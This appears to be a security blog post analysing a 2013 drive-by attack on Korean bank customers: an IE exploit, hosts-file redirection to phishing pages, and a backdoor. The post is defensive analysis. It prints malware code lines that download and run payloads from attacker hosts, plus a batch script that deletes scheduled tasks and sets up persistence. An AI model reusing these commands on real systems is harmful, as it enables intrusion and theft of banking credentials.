Analysis of Chinese attack against Korean banks

In this blog post, we will look at the attack originating from hxxp://www.spc.or.kr/ and targeting several major Korean banks.

The site, spc.or.kr, is a legitimate Korean website which belongs to Korea Software Property Right Council (SPC). After opening the site and showing its source code, we looked into the included script /js/common1.js. This script includes another two javascripts ( the third one is commented out ). When we opened both of these scripts, we noticed a suspicious iframe tag at the end of /js/screen1.js. This iframe tag led us to rootadmina2012.com, which is the main attack site.

01-original_website

 

02-original_source

03-original_source2

04-original_source3

The original website, rootadmin2012.com, contains the following three lines of code:

05-rootadmin

The first two items are iframes which contain heapspray and shellcodes, and the last script tag is a counter, which tells cybercriminals how many times the main attack page was executed.

After a brief examination of 1.html, we can notice a variable with the interesting name “shellcode”

06-onehtml

which, after unquoting, gives us the following shellcode:

07-shellcode

You can notice visible text strings inside – Urlmon, which is a windows library for internet communication; C:\x.exe, which is the name of file, in which downloaded contents is stored and later executed; and http://rootadmin2012.com/sun.exe, which contains another stage of attack.

After observing cc.html, we can notice another interesting strings:

08-ccheaplib

This gives us a hunch that this exploit has something to do with Internet Explorer (ie), and heap spraying (heaplib). After further searching, we were able to determine that this attack uses the CVE-2012-1889 ( http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889 ) vulnerability, which allows a remote attacker via a crafted web site to execute arbitrary code. Search for classid=f6D90f11-9c73-11d3-b32e-00C04f990bb4 in both cc.html and following link at exploit database http://www.exploit-db.com/exploits/19186/.

09-ccspray

It is important to note that this attack worked only on computers with disabled DEP ( data execution prevention ). If you run this attack on computer with enabled DEP, the following message is displayed

10-IE_with_DEP_on

File sun.exe is the second stage downloader, size 15KB, written in Visual Basic. It has the same icon as Microsoft Word documents.

 

12-second_stage_downloader

When it gets downloaded, it performs the following tasks:

1) Checks internet connection by downloading an image from naver.net, which is a Korean search engine

URLDownloadToFileA(“http://static.naver.net/w9/blank.gif”, “c:\ntldrs\Isinter.gif”)
If (sizeOfFile(“c:\ntldrs\Isinter.gif”) > 0) Then
Delete “c:/ntldrs/Isinter.gif”

2) Downloads
URLDownloadToFileA(“http://myadmin2012.com/sun.txt”, “c:\ntldrs\system.yf”)

11-sun
which is then appended to hosts file C:\WINDOWS\system32\drivers\etc\hosts. Anytime user accesses any of the above mentioned websites belonging to Korean banks, he/she gets redirected to 126.114.224.53 (softbank126114224053.bbtec.net), which is a server located in Japan.

3) Opens the following website in http://myadmin2012.com/tong.htm”
“C:\Program Files\Internet Explorer\IEXPLORE.EXE”.

tong.htm contains

13-tong

which is a script for another counter, which tells attackers, how many times the downloader was downloaded.

4) To make itself persistent ( in case of computer reboot, etc… )

it modifies Software\Microsoft\Windows\CurrentVersion\Run registry key by adding value with name “skunser” and data “C:\ntldrs\svchest.exe”, where it previously copied itself.

14-run_registry_modification

5) It downloads a backdoor file,

—————————————————————————
URLDownloadToFileA(“http://www.hisunpharm.com/files/File/product/pao.exe”, “C:\Program Files\tongji2.exe”)
—————————————————————————

stores it into tongji2.exe, and executes it. Tongji2 is a backdoor file which attempts to connect to another website controlled by cybercriminals.

6) It drops and executes the following batch file, which schedules the start of a downloader each 30 minutes. “At XX:XX /interactive” ensures, that svchest.exe is started with Local System privileges (on WinXP), which are higher than Administrator privileges.

—————————————————————————
@echo off
schtasks /delete /tn * /f
sc config Schedule start= auto
net start “Task Scheduler”
At 0:00  /interactive c:/ntldrs/svchest.exe
At 0:30  /interactive c:/ntldrs/svchest.exe
At 1:00  /interactive c:/ntldrs/svchest.exe
At 1:30  /interactive c:/ntldrs/svchest.exe

At 24:30  /interactive c:/ntldrs/svchest.exe
del %0
—————————————————————————

The third stage of the attack is the main tongji2.exe module.

This module is an executable with a size of about 1.3M, written in Delphi, packed with Safengine. From dynamic analysis, we can observe, that after execution it injects itself into iexplore.exe to become less suspicious for untrained computer users. It then tries to initiate a connection via custom communication protocol. Received messages are decrypted by a simple xor loop. Then, depending on the contents of the received message, it chooses to execute one from many built-in functions, for example, download file, reboot computer, read clipboard, read registry, read system information and many others. We can classify this as backdoor trojan and infostrealer, which allows attackers to control the compromised computer. It also tries to connect to laoding521.eicp.net, port 889. eicp.net, free Chinese webhosting, which belongs to oray.com.

Let’s have a look at consequences of modified hosts file. In a screenshot above, we show that the hosts file is modified in such a way that the IP address is followed by an URL address of a Korean bank. The same scenario occurs more than once – for several Korean banks. We will show you an example of Koonmin Bank ( KBStar ). In the screenshot below, you can see the original KBStar webpage. Notice the red oval in upper left corner. It shows https, http-secure, communication is encrypted and therefore all data entered and sent by the bank’s customer is encrypted before being sent.

16-kbstar.orig

When we open the same webpage on an infected computer (with modified hosts file), it will show exactly the same page (visually), but the source code of the main webpage is now different. The user does not communicate with the bank’s website, but with attacker’s server. See the screenshot below. We can notice that string “onclick=otperror(”)” repeated often in the fake site ( left ),  normal links are displayed in the original site ( right ).

17-diff

After user clicks on any link on the fake webpage, he/she is shown the following error message saying that the computer was infected by a virus and, for security reasons, he/she needs to fill in application for fraud prevention service.

18-kbstar_modif

After clicking the OK button, the user is redirected to the page, where he/she is asked for their name and social security number (SSN). When the format of entered SSN is correct, it redirects users to further forms asking for more customer details, including address, phone number, security card, and many more details.

19-afterOKNote the left upper corner. These forms are not encrypted, therefore all private customer information is being sent to attackers in unencrypted form. Cybercriminals then have all the victim’s credentials and can plunder money from the victim’s account.

Many Korean websites require a name and SSN for registration. There have been many SSN leaks, so some websites started moving to a IPIN (Internet Personal Identification Number), which is a secure replacement for name and SSN. However, IPIN is still not so popular so name and SSN are still valuable information. A similar situation is occurring with the Security Card, which is also an important part of Korean Internet banking. Without this card, customers can’t issue a certificate for internet banking. A few years ago, many Korean banks started moving to OTP (One Time Password) dongle. However, many people are still using security cards, which is why cybercriminals want to steal them too. Korean internet banking might be more secure if all the customers used previously mentioned safer methods of authentication. Unfortunately, there are still many people using old and less secure methods of accessing their accounts.Cybercriminals know it and take advantage of it.

 

Info about domains:

Domain Name:        ROOTADMIN2012.COM
Creation Date:        23-jan-2013
Expiration Date:    23-jan-2014

Domain Name:        MYADMIN2012.COM
Creation Date:        23-jan-2013
Expiration Date:    23-jan-2014

Both domains hosted in the following IP address in Japan:
61.196.247.51 (061196247051.cidr.odn.ne.jp)

Conclusion:

The attack probably originates in China. Aside from location of the final (laoding521.eicp.net), which is in China, analysis of both 2nd and 3rd stage executable makes us think so. First of all, file names like tongji (statistics), tong (connect), pao (run) are definitely Chinese.

After decompiling the second stage downloader, we can find another Chinese words
Private Sub duquwenjian_Timer (wenjian = document, file)
Attribute VB_Name = “hei” (hei = hack)
Public Sub chuangjian (chuangjian = find, establish)
Public Sub wanbi (wanbi = finish, end, complete)
etc…

15-hei_hack

The 3rd stage is protected with Safengine, a Chinese executable protector, which is typically not seen with malware coming from other countries.

Thanks to Chae Jong Bin for help.

SHAS:
2nd stage downloader    E5B33DFF49863AEE9AE768CF62C607B8126D4640BDF47098863FFB722FABCBBA
3rd stage backdoor        80E2FFCE8BBDCA2A278B753D74EC1252FB0C6806389B12F126C0D712F4AE0724

 

Leave a Reply